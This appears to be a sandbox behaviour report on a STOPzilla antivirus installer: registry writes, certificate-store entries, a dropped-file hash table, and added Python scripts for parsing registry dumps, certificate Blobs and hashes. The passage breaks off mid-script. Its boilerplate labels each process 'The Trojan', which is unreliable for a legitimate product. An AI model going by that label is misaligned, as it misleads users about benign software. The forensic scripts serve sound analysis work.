"(Default)" = "{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}"
[HKCR\GFI.SBOEPlugIn.1]
"(Default)" = "SBOEPlugIn Class"
[HKCR\TypeLib\{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}\1.0\0\win64]
"(Default)" = "%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll"
[HKCR\AppID\SBOutlookExpress.DLL]
"AppID" = "{AC7CD0E2-273C-4EAC-B873-904CE5E01472}"
[HKCR\SBAMOutlook.SBOutlookPlugIn.1\CLSID]
"(Default)" = "{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}"
[HKCR\Interface\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}\TypeLib]
"Version" = "1.0"
[HKCR\GFI.SBWLMailPlugIn]
"(Default)" = "SBWLMailPlugIn Class"
[HKCR\CLSID\{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}\VersionIndependentProgID]
"(Default)" = "SBAMOutlook.SBOutlookPlugIn"
[HKCR\CLSID\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}\InProcServer32]
"(Default)" = "%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll"
[HKCR\Interface\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}\TypeLib]
"(Default)" = "{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}"
[HKCR\CLSID\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}\InProcServer32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}\TypeLib]
"(Default)" = "{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}"
[HKCR\CLSID\{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}\InprocServer32]
"(Default)" = "%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll"
[HKCR\CLSID\{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}\VersionIndependentProgID]
"(Default)" = "GFI.SBWLMailPlugIn"
[HKLM\SOFTWARE\Nektra\WLMAILAPI\Plugins]
"GFI" = "GFI.SBWLMailPlugIn"
[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}]
"(Default)" = "SBOEPlugIn Class"
[HKCR\GFI.SBOEPlugIn\CurVer]
"(Default)" = "GFI.SBOEPlugIn.1"
[HKLM\SOFTWARE\Microsoft\Office\Outlook\Addins\SBAMOutlook.SBOutlookPlugIn.1]
"LoadBehavior" = "3"
[HKCR\CLSID\{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}]
"(Default)" = "SBWLMailPlugIn Class"
[HKCR\Interface\{F0558B4E-7949-4EC4-8DB8-F8E79D1C07AE}]
"(Default)" = "ISBWLMailPlugIn"
[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}]
"AppID" = "{AC7CD0E2-273C-4EAC-B873-904CE5E01472}"
[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{E868ABBE-1502-4D7A-BDC2-E6BCDE75959B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Office\Outlook\Addins\SBAMOutlook.SBOutlookPlugIn.1]
"FriendlyName" = "VIPRE Outlook AntiVirus Object"
[HKCR\GFI.SBWLMailPlugIn.1]
"(Default)" = "SBWLMailPlugIn Class"
[HKCR\GFI.SBWLMailPlugIn\CurVer]
"(Default)" = "GFI.SBWLMailPlugIn.1"
[HKCR\Interface\{E868ABBE-1502-4D7A-BDC2-E6BCDE75959B}\NumMethods]
"(Default)" = "7"
[HKCR\Interface\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}]
"(Default)" = "SBOutlookPlugIn Class"
[HKCR\CLSID\{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}\InprocServer32]
"(Default)" = "%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll"
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}\InprocServer32]
"(Default)" = "%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll"
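Two of the registry sections above are the ones worth checking mechanically: the minifilter instance registered by RUNDLL32.exe:3528 (Altitude 268000 under services\sbapifs\Instances\ActiveProtection, with a GroupOrderList entry for "FSFilter Content Screener" written at the same time) and the Outlook add-in registered by regsvr32.exe:1496 (LoadBehavior 3 under Office\Outlook\Addins). The following Python is an added example, not part of the Lavasoft report or of STOPzilla. It parses the report's own "[key]" / "name" = "value" layout (the relevant lines are reproduced inline as constructed sample input), maps the altitude onto Microsoft's published load-order-group ranges (the table is abbreviated to the groups it needs plus a few common ones) and resolves the add-in ProgID through its CLSID to the DLL Outlook will load.

```python
import re
from collections import defaultdict

# Constructed sample input: the minifilter and Outlook add-in lines quoted from the
# RUNDLL32.exe:3528 and regsvr32.exe:1496 sections of the report, in the report's layout.
SAMPLE_DUMP = r'''
[HKLM\System\CurrentControlSet\services\sbapifs\Instances\ActiveProtection]
"Altitude" = "268000"
"Flags" = "2"
[HKLM\System\CurrentControlSet\services\sbapifs\Instances]
"DefaultInstance" = "ActiveProtection"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"FSFilter Content Screener" = "02 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Office\Outlook\Addins\SBAMOutlook.SBOutlookPlugIn.1]
"LoadBehavior" = "3"
"FriendlyName" = "VIPRE Outlook AntiVirus Object"
[HKCR\SBAMOutlook.SBOutlookPlugIn.1\CLSID]
"(Default)" = "{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}"
[HKCR\CLSID\{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}\InprocServer32]
"(Default)" = "%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll"
"ThreadingModel" = "Apartment"
'''

VALUE_RE = re.compile(r'^"([^"]*)"\s*=\s*"(.*)"$')

def parse_reg_dump(text):
    """Parse '[key]' / '"name" = "value"' lines into {key.lower(): {name: value}}.
    Keys are lower-cased because the registry is case-insensitive and the report
    mixes spellings (InprocServer32 / InProcServer32); value names keep their case."""
    reg = defaultdict(dict)
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1].lower()
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            reg[key][m.group(1)] = m.group(2)
    return dict(reg)

# Abbreviated from Microsoft's published load-order-group altitude ranges for minifilters.
ALTITUDE_GROUPS = [
    (400000, 409999, 'FSFilter Top'),
    (360000, 389999, 'FSFilter Activity Monitor'),
    (340000, 349999, 'FSFilter Undelete'),
    (320000, 329999, 'FSFilter Anti-Virus'),
    (300000, 309999, 'FSFilter Replication'),
    (280000, 289999, 'FSFilter Continuous Backup'),
    (260000, 269999, 'FSFilter Content Screener'),
    (240000, 249999, 'FSFilter Quota Management'),
    (140000, 149999, 'FSFilter Encryption'),
    (40000, 49999, 'FSFilter Bottom'),
]

def altitude_group(altitude):
    """Load-order group whose range contains the altitude string, or None."""
    alt = float(altitude)
    for lo, hi, name in ALTITUDE_GROUPS:
        if lo <= alt <= hi:
            return name
    return None

INSTANCE_RE = re.compile(r'^hklm\\system\\currentcontrolset\\services\\([^\\]+)\\instances\\([^\\]+)$')

def minifilter_instances(reg):
    """One record per minifilter instance: the group its altitude falls in, and whether
    a GroupOrderList entry for that group was written in the same dump."""
    written = {g.lower() for g in reg.get(r'hklm\system\currentcontrolset\control\grouporderlist', {})}
    out = []
    for key, values in reg.items():
        m = INSTANCE_RE.match(key)
        if not m or 'Altitude' not in values:
            continue
        group = altitude_group(values['Altitude'])
        out.append({'service': m.group(1), 'instance': m.group(2),
                    'altitude': values['Altitude'], 'group': group,
                    'group_order_entry_written': (group or '').lower() in written})
    return out

ADDIN_RE = re.compile(r'^hklm\\software\\microsoft\\office\\([^\\]+)\\addins\\(.+)$')

def resolve_office_addins(reg):
    """Office add-in ProgID -> CLSID -> in-process DLL. LoadBehavior 3 means the add-in
    is loaded and connected every time the host application starts."""
    out = []
    for key, values in reg.items():
        m = ADDIN_RE.match(key)
        if not m:
            continue
        app, progid = m.groups()
        clsid = reg.get('hkcr\\' + progid + '\\clsid', {}).get('(Default)')
        dll = None
        if clsid:
            dll = reg.get('hkcr\\clsid\\' + clsid.lower() + '\\inprocserver32', {}).get('(Default)')
        out.append({'app': app, 'progid': progid, 'clsid': clsid, 'dll': dll,
                    'load_behavior': values.get('LoadBehavior'),
                    'autoload': values.get('LoadBehavior') == '3'})
    return out

if __name__ == '__main__':
    reg = parse_reg_dump(SAMPLE_DUMP)
    for rec in minifilter_instances(reg) + resolve_office_addins(reg):
        print(rec)
```

On the sample, 268000 falls in the Content Screener range (260000 to 269999), which agrees with the GroupOrderList entry written alongside it, and SBAMOutlook.SBOutlookPlugIn.1 resolves to %Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll with LoadBehavior 3. Content Screener filters attach below the Anti-Virus group (320000 to 329999), so any anti-virus minifilter already on the host sees file I/O before this one does.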
The process SZNetAssistant.exe:3916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\27AC9369FAF25207BB2627CEFACCBE4EF9C319B8]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 27 AC 93 69"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 80 3A BC 22"
[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E\52C64B7E]
"LanguageList" = "en-US, en"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"47BEABC922EAE80E78783462A79F45C254FDE68B"
[HKU\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates]
"27AC9369FAF25207BB2627CEFACCBE4EF9C319B8"
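SZNetAssistant.exe:3916 writes and deletes two certificate store entries: an intermediate in the CA store of the LocalSystem profile (HKU\.DEFAULT) and a root in HKLM AuthRoot. The AuthRoot key name is the same thumbprint that appears in the ctldl.windowsupdate.com .crt URL in the URL list below, and the CA entry is written while the installer fetches gdig2.crt from GoDaddy's repository, so the activity is consistent with CryptoAPI building a certificate chain (automatic root update plus AIA fetch) rather than with an attacker planting a root. The "Blob" values are the serialised store entries: a sequence of records, each a DWORD property id, a DWORD reserved field (always 1), a DWORD length and the data. The printed prefix 03 00 00 00 01 00 00 00 14 00 00 00 27 AC 93 69 is a SHA1 hash property (id 3) of 20 bytes whose first four bytes match the key name; the report truncates the rest. The following Python is an added example, not part of the report or of STOPzilla. It parses such a Blob, recovers the embedded certificate (property id 32) and checks that key name, SHA1 property and certificate hash agree; the certificate bytes it uses are a constructed stand-in, not a real certificate, and the truncated page value is used to show how a cut-off record is reported.

```python
import hashlib
import struct

# Property identifiers used in the serialised store entry (wincrypt.h CERT_*_PROP_ID).
CERT_SHA1_HASH_PROP_ID = 3
CERT_MD5_HASH_PROP_ID = 4
CERT_CERT_PROP_ID = 32       # the DER-encoded certificate itself

# The first 16 bytes of the CA\Certificates\27AC9369... "Blob" as printed in the report.
PAGE_BLOB_PREFIX = bytes.fromhex('03 00 00 00 01 00 00 00 14 00 00 00 27 AC 93 69')
PAGE_KEY_NAME = '27AC9369FAF25207BB2627CEFACCBE4EF9C319B8'

def peek_header(blob):
    """(property id, declared data length) of the first record; needs only 12 bytes."""
    prop_id, _reserved, cb = struct.unpack_from('<III', blob, 0)
    return prop_id, cb

def parse_blob(blob):
    """Walk the record sequence: DWORD prop_id, DWORD reserved (1), DWORD length, data.
    Raises ValueError when the data ends inside a record, which is what happens with
    the truncated values the report prints."""
    props, off = {}, 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f'truncated record header at offset {off}')
        prop_id, _reserved, cb = struct.unpack_from('<III', blob, off)
        off += 12
        if off + cb > len(blob):
            raise ValueError(f'record {prop_id} declares {cb} bytes, {len(blob) - off} remain')
        props[prop_id] = blob[off:off + cb]
        off += cb
    return props

def is_truncated(blob):
    try:
        parse_blob(blob)
        return False
    except ValueError:
        return True

def build_blob(cert_der):
    """Serialise SHA1, MD5 and certificate records for a DER body (test input only)."""
    records = [(CERT_SHA1_HASH_PROP_ID, hashlib.sha1(cert_der).digest()),
               (CERT_MD5_HASH_PROP_ID, hashlib.md5(cert_der).digest()),
               (CERT_CERT_PROP_ID, cert_der)]
    return b''.join(struct.pack('<III', pid, 1, len(d)) + d for pid, d in records)

def check_store_entry(key_name, blob):
    """The key name, the stored SHA1 property and the SHA1 of the embedded certificate
    must all agree; anything else points at a hand-edited or corrupted store entry."""
    findings = []
    props = parse_blob(blob)
    sha1_prop = props.get(CERT_SHA1_HASH_PROP_ID)
    cert = props.get(CERT_CERT_PROP_ID)
    if sha1_prop is None:
        findings.append('no SHA1 property')
    elif sha1_prop.hex().upper() != key_name.upper():
        findings.append('SHA1 property does not match key name')
    if cert is None:
        findings.append('no certificate body')
    elif hashlib.sha1(cert).hexdigest().upper() != key_name.upper():
        findings.append('embedded certificate does not hash to key name')
    return findings

# Constructed stand-in for a DER certificate: only its hash matters here.
FAKE_CERT = b'\x30\x82\x01\x00' + bytes(range(256))
FAKE_KEY_NAME = hashlib.sha1(FAKE_CERT).hexdigest().upper()

if __name__ == '__main__':
    print(peek_header(PAGE_BLOB_PREFIX), 'truncated:', is_truncated(PAGE_BLOB_PREFIX))
    print(check_store_entry(FAKE_KEY_NAME, build_blob(FAKE_CERT)))
    print(check_store_entry(PAGE_KEY_NAME, build_blob(FAKE_CERT)))
```

On a live system the same parser can be pointed at the exported Blob of any entry under ROOT\Certificates or AuthRoot\Certificates; a consistent entry whose recovered certificate is unknown is the case that then deserves a look, not the key/hash mismatch, which in practice indicates corruption.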
The process mobsync.exe:3264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\SyncMgr\HandlerInstances\{750FDF10-2A26-11D1-A3EA-080036587F03}]
"SyncTime" = "00 00 00 00 00 00 00 00"
"Connected" = "1"
[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\SyncMgr]
"StartAtLogin" = "0"
[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\SyncMgr\HandlerInstances\{750FDF10-2A26-11D1-A3EA-080036587F03}]
"Enabled" = "1"
The process SZServer.exe:3384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\5A1C102CCFDFDB5468E601489DB25A5E\Usage]
"STOPzilla_Files" = "1184432147"
The process MsiExec.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\HELPDIR]
"(Default)" = ""
[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\0\win32]
"(Default)" = "C:\Windows\SysWOW64\msxml4.dll"
[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0]
"(Default)" = "Microsoft XML, v4.0"
The Trojan deletes the following registry key(s):
[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\0\win32]
[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\HELPDIR]
[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0]
[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\FLAGS]
[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\0]
Dropped PE files
MD5 | File path |
---|---|
b161d2688806d6b7a93a79e325be8066 | c:\Program Files (x86)\STOPzilla\Definitions\IncompatiblePrograms.dll |
3f20b1f14617ebe8cf3c7316b62c71e5 | c:\Program Files (x86)\STOPzilla\Definitions\gfiark.dll |
fe4d369172ac1cc19c876bdb5bdc31a3 | c:\Program Files (x86)\STOPzilla\Definitions\gfiark32.sys |
4ea5458fca8518344686c543749365b1 | c:\Program Files (x86)\STOPzilla\Definitions\gfiark64.sys |
7604c69f910e7087d6323b6fc1c8c482 | c:\Program Files (x86)\STOPzilla\Definitions\gfiarkup.dll |
d5034f1c940065cbe9febbde733a3e36 | c:\Program Files (x86)\STOPzilla\Definitions\gfiutil.dll |
3eaeb9143a5dbc1082785bbbe8d8cfea | c:\Program Files (x86)\STOPzilla\Definitions\gfiutl32.sys |
16a23ff8621929adc5b18dccd5e206ee | c:\Program Files (x86)\STOPzilla\Definitions\gfiutl64.sys |
5960bad9ff184dcd8f032c7d909cee7e | c:\Program Files (x86)\STOPzilla\Definitions\kbu.dll |
218b5eda2be90c6de35896779a451e63 | c:\Program Files (x86)\STOPzilla\Definitions\lgpl.dll |
00e66576a6546fdbcd8d69fa9a341c90 | c:\Program Files (x86)\STOPzilla\Definitions\lib7zip.dll |
98dbc4ee648e95b2da496d530645bca2 | c:\Program Files (x86)\STOPzilla\Definitions\libBase64.dll |
ed02af97b3b634366ab3a95d01db0e2e | c:\Program Files (x86)\STOPzilla\Definitions\libCHM.dll |
99668910cee4edc6b4b0f85c509b8f53 | c:\Program Files (x86)\STOPzilla\Definitions\libEmail.dll |
ad9b286c561f8003d7c72ac5619c3b4e | c:\Program Files (x86)\STOPzilla\Definitions\libMachoUniv.dll |
71ac4c5a866dd478b2738bed4db9de90 | c:\Program Files (x86)\STOPzilla\Definitions\libMsCab.dll |
02ab09d06f7ce435debac7ef8acf19ae | c:\Program Files (x86)\STOPzilla\Definitions\libMsi.dll |
396dfe4a9cd641e7434f33506ece790b | c:\Program Files (x86)\STOPzilla\Definitions\libNSIS.dll |
c7566f4c1047997d86883a28d3ed02a7 | c:\Program Files (x86)\STOPzilla\Definitions\libOleA.dll |
e44a1d3a2204080d64cacd126206b9ba | c:\Program Files (x86)\STOPzilla\Definitions\libRTF.dll |
4585f5837ab43866580cf92c4cf4ed62 | c:\Program Files (x86)\STOPzilla\Definitions\libRar.dll |
9200387ed2757b65872be3d44dd3bbd8 | c:\Program Files (x86)\STOPzilla\Definitions\libVvs.dll |
d7a8e954cbff33e2c22d2c97d05f0112 | c:\Program Files (x86)\STOPzilla\Definitions\libZip.dll |
e69e80320e3dd4a95e0bcac115a1737c | c:\Program Files (x86)\STOPzilla\Definitions\libtd.dll |
7b293f4b7fba99a8fe190e8263abda17 | c:\Program Files (x86)\STOPzilla\Definitions\patchw32.dll |
592133b8c71bf389fb02ae0d983f1b15 | c:\Program Files (x86)\STOPzilla\Definitions\remediation.dll |
81544235fa6fbe909aa45480ceb4b28e | c:\Program Files (x86)\STOPzilla\Definitions\updater.dll |
58cd98421f7cc9b85764f8d55ef421cf | c:\Program Files (x86)\STOPzilla\Definitions\vcore.dll |
7b7505f8674ac9c8418b55f807a06f1d | c:\Program Files (x86)\STOPzilla\Drivers\amd64\sbapifs.sys |
c2d6ea33266fcd9a08003b91e24344c9 | c:\Program Files (x86)\STOPzilla\Drivers\amd64\wlh\SBTIS.sys |
97ecce37dbaa0a871b4504cef53ee76b | c:\Program Files (x86)\STOPzilla\Drivers\amd64\wlh\SBWTIS.sys |
1b1ae5f447175d4b0b32b959b1adb287 | c:\Program Files (x86)\STOPzilla\Drivers\amd64\wlh\sbfw.sys |
4a5f19b271f147d93a596a920db267d2 | c:\Program Files (x86)\STOPzilla\Drivers\amd64\wlh\sbhips.sys |
f1a634ec4c67ae3a73a45e8889a50a7b | c:\Program Files (x86)\STOPzilla\Drivers\amd64\wnet\SBTIS.sys |
9aef0f267553fd9c900e9449b61586b7 | c:\Program Files (x86)\STOPzilla\Drivers\amd64\wnet\SbFwIm.sys |
562b2169b40a26c261fe8825ec7bafe0 | c:\Program Files (x86)\STOPzilla\Drivers\amd64\wnet\sbfw.sys |
22b224ab09f7756ee84219be38a4a6d5 | c:\Program Files (x86)\STOPzilla\Drivers\i386\sbaphd.sys |
56a449846631a90acd4c585adcdaf30f | c:\Program Files (x86)\STOPzilla\Drivers\i386\sbapifs.sys |
f581f124ca70b2e1272cfd16a46a3332 | c:\Program Files (x86)\STOPzilla\Drivers\i386\sbapifsl.sys |
e6b0078dd3243517d287ad603d9d530f | c:\Program Files (x86)\STOPzilla\Drivers\i386\w2k\SBTIS.sys |
9b60012f6212d87ad4c3a87f66fd5608 | c:\Program Files (x86)\STOPzilla\Drivers\i386\w2k\SbFwIm.sys |
e3a663da49929a172c4a70deeb63f364 | c:\Program Files (x86)\STOPzilla\Drivers\i386\w2k\sbfw.sys |
23e0af9ad52a479e6a03a2f37c0d3251 | c:\Program Files (x86)\STOPzilla\Drivers\i386\wlh\SBTIS.sys |
804ea0e614b340bdd40c8ef4662698bf | c:\Program Files (x86)\STOPzilla\Drivers\i386\wlh\SBWTIS.sys |
d43f30ac7ba8f5c42bd80640d9369fcf | c:\Program Files (x86)\STOPzilla\Drivers\i386\wlh\sbfw.sys |
da12cd4cc9f5894c1627d4f5f6eb23c2 | c:\Program Files (x86)\STOPzilla\Drivers\i386\wlh\sbhips.sys |
1b4acddfe18b30c51f624734b1d98f3a | c:\Program Files (x86)\STOPzilla\Drivers\i386\wxp\SbFwIm.sys |
25d11986a7553b2419f841b45a4ec812 | c:\Program Files (x86)\STOPzilla\GFI.Tools.Run64.exe |
9639e9f51b79467aceead299a10aaeb2 | c:\Program Files (x86)\STOPzilla\IncompatiblePrograms.dll |
1c5a13ce6a6aef0002eee3be451e36df | c:\Program Files (x86)\STOPzilla\SBAMOutlook.dll |
d15b5914ef9bdfdf8258d49a28fab665 | c:\Program Files (x86)\STOPzilla\SBAMSvc.exe |
93ca0d75c20b8573168fe66f2ff1471f | c:\Program Files (x86)\STOPzilla\SBAMSvcPS.dll |
cb80af4b93622279bc19e84e98f92d1a | c:\Program Files (x86)\STOPzilla\SBArva.dll |
372746a478f9418e05dcc9da4a6aa6e5 | c:\Program Files (x86)\STOPzilla\SBCA.dll |
e6b695bc8bfdae023fc456550fa818f3 | c:\Program Files (x86)\STOPzilla\SBRC.exe |
5e18c431d340e8635578ac6c1ee4e56a | c:\Program Files (x86)\STOPzilla\SBSetupDrivers.exe |
b5e8fcea8b777a272dcdf2a5eef951ea | c:\Program Files (x86)\STOPzilla\SBTE.dll |
8e997e071e69f84b4f4a5593b6105ae8 | c:\Program Files (x86)\STOPzilla\SBTIS.dll |
6bf9fa1f744484cb75875cbb1ed9e0cf | c:\Program Files (x86)\STOPzilla\STOPzilla.exe |
4120a8388a98f15ea4e924d5723755cb | c:\Program Files (x86)\STOPzilla\SZFileAssistant.exe |
976e0317dde869d6b9df27d35ae85580 | c:\Program Files (x86)\STOPzilla\SZNetAssistant.exe |
3855f9938aa8efeb260aa7ea7dfedf1a | c:\Program Files (x86)\STOPzilla\SZServer.exe |
6f83bdd5d8037dbc4822c8dc52f92c34 | c:\Program Files (x86)\STOPzilla\SZWSC.exe |
d1a1adc701fe30c14865ed1175566d49 | c:\Program Files (x86)\STOPzilla\SbFwe.dll |
86a9b72debf646ee577acc3f92267155 | c:\Program Files (x86)\STOPzilla\SbHips.dll |
0f7951b5e9059986f8d86d3bd051255a | c:\Program Files (x86)\STOPzilla\SbWebFilter.dll |
441fb58a8d6dab39e7ce05e501d81163 | c:\Program Files (x86)\STOPzilla\SpursDownload.dll |
3f20b1f14617ebe8cf3c7316b62c71e5 | c:\Program Files (x86)\STOPzilla\gfiark.dll |
fe4d369172ac1cc19c876bdb5bdc31a3 | c:\Program Files (x86)\STOPzilla\gfiark32.sys |
4ea5458fca8518344686c543749365b1 | c:\Program Files (x86)\STOPzilla\gfiark64.sys |
93b9a6f54844e1da1806f56f3f054ac7 | c:\Program Files (x86)\STOPzilla\gfiarksh.dll |
d5034f1c940065cbe9febbde733a3e36 | c:\Program Files (x86)\STOPzilla\gfiutil.dll |
3eaeb9143a5dbc1082785bbbe8d8cfea | c:\Program Files (x86)\STOPzilla\gfiutl32.sys |
16a23ff8621929adc5b18dccd5e206ee | c:\Program Files (x86)\STOPzilla\gfiutl64.sys |
5960bad9ff184dcd8f032c7d909cee7e | c:\Program Files (x86)\STOPzilla\kbu.dll |
9ce7bd04edf43a81685030ff09e7f4d7 | c:\Program Files (x86)\STOPzilla\mimepp.dll |
0dc41cc978fd05152390174b95851e3e | c:\Program Files (x86)\STOPzilla\oeapiinitcom.dll |
2a769418ed33aa3e702c7327a6699e17 | c:\Program Files (x86)\STOPzilla\oecom.dll |
5fa9b930e89b8cbbb51c4daacc002207 | c:\Program Files (x86)\STOPzilla\oehook.dll |
7a4d7e803857225e1b6bbccfce3e3d23 | c:\Program Files (x86)\STOPzilla\oestore.dll |
55ff4d566ab4561d2fbc3d9bf4fb0c26 | c:\Program Files (x86)\STOPzilla\sbap.dll |
a5fe51b8ce661a935a165803c65a4bf1 | c:\Program Files (x86)\STOPzilla\unrar.dll |
c610485022bdaf12f3836b6955470b69 | c:\Program Files (x86)\STOPzilla\vipre.dll |
a8686b335519e7cc14dfeeebb0cb3d9c | c:\Program Files (x86)\STOPzilla\x32\sbbd.exe |
2b27f39cd22a9bad7b6e433d0233b68e | c:\Program Files (x86)\STOPzilla\x64\SBAMOutlook.dll |
a6767bed03486826014fb47875bbed6c | c:\Program Files (x86)\STOPzilla\x64\SBAMSvcPS.dll |
b97ad2bcd333f82776d7ff1ead919ce2 | c:\Program Files (x86)\STOPzilla\x64\sbbd.exe |
44d101190beacc0bacc8af12ee16c7fe | c:\Windows\Installer\{C201C1A5-FDFC-45BD-866E-1084D92BA5E5}\ARPPRODUCTICON.exe |
44d101190beacc0bacc8af12ee16c7fe | c:\Windows\Installer\{C201C1A5-FDFC-45BD-866E-1084D92BA5E5}\NewShortcut1_E1495BBB3B6443E69DBFB09B3D0691D2.exe |
966cdbb7fec5242b2552d55fcd2a3c12 | c:\Windows\Installer\{C201C1A5-FDFC-45BD-866E-1084D92BA5E5}\UninstallSTOPzilla_14DDE1424B2549418BFF0B4BDBBB0762.exe |
df9a5545501a2442ca54c73c6f4de827 | c:\Windows\SysWOW64\mfc120.dll |
f4f2a4c459dd3aa22dd3984d13b15746 | c:\Windows\SysWOW64\mfc120u.dll |
832cc047743469082fae5e3cc830cd8c | c:\Windows\SysWOW64\mfcm120.dll |
ab8766067bb26d7ab4061b0e4fc7d2c0 | c:\Windows\SysWOW64\mfcm120u.dll |
fd5cabbe52272bd76007b68186ebaf00 | c:\Windows\SysWOW64\msvcp120.dll |
034ccadc1c073e4216e9466b720f9849 | c:\Windows\SysWOW64\msvcr120.dll |
44e45bd9327abc0540593e809b32f3ca | c:\Windows\SysWOW64\msxml4.dll |
cf34eec288a4c53e71602d5e0d65ef89 | c:\Windows\SysWOW64\msxml4r.dll |
b97ad2bcd333f82776d7ff1ead919ce2 | c:\Windows\SysWOW64\sbbd.exe |
69837e50c50561a083a72a5f8ea1f6a2 | c:\Windows\SysWOW64\vccorlib120.dll |
9aef0f267553fd9c900e9449b61586b7 | c:\Windows\System32\DriverStore\FileRepository\sbfwim.inf_amd64_neutral_09abe461a7fb864d\amd64\wnet\SBFWIM.sys |
df9a5545501a2442ca54c73c6f4de827 | c:\Windows\System32\mfc120.dll |
f4f2a4c459dd3aa22dd3984d13b15746 | c:\Windows\System32\mfc120u.dll |
832cc047743469082fae5e3cc830cd8c | c:\Windows\System32\mfcm120.dll |
ab8766067bb26d7ab4061b0e4fc7d2c0 | c:\Windows\System32\mfcm120u.dll |
fd5cabbe52272bd76007b68186ebaf00 | c:\Windows\System32\msvcp120.dll |
034ccadc1c073e4216e9466b720f9849 | c:\Windows\System32\msvcr120.dll |
44e45bd9327abc0540593e809b32f3ca | c:\Windows\System32\msxml4.dll |
cf34eec288a4c53e71602d5e0d65ef89 | c:\Windows\System32\msxml4r.dll |
b97ad2bcd333f82776d7ff1ead919ce2 | c:\Windows\System32\sbbd.exe |
69837e50c50561a083a72a5f8ea1f6a2 | c:\Windows\System32\vccorlib120.dll |
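The Dropped PE files table has 111 rows but considerably fewer distinct hashes: the same MD5 appears under STOPzilla\Definitions and the STOPzilla root, and under both C:\Windows\System32 and C:\Windows\SysWOW64. The second kind is an artefact of running a 32-bit installer on 64-bit Windows: writes to System32 are redirected to SysWOW64 by WOW64 file-system redirection, so one file is recorded under two paths. The following Python is an added example, not part of the report or of STOPzilla. It parses rows in the table's own format (a constructed subset of the rows above is embedded), reduces them to distinct hashes for lookup or submission, flags System32/SysWOW64 twins and lists the kernel drivers (.sys), whose signatures are the first thing to verify.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of rows copied from the Dropped PE files table above.
SAMPLE_ROWS = r'''
3f20b1f14617ebe8cf3c7316b62c71e5 | c:\Program Files (x86)\STOPzilla\Definitions\gfiark.dll |
3f20b1f14617ebe8cf3c7316b62c71e5 | c:\Program Files (x86)\STOPzilla\gfiark.dll |
7b7505f8674ac9c8418b55f807a06f1d | c:\Program Files (x86)\STOPzilla\Drivers\amd64\sbapifs.sys |
6bf9fa1f744484cb75875cbb1ed9e0cf | c:\Program Files (x86)\STOPzilla\STOPzilla.exe |
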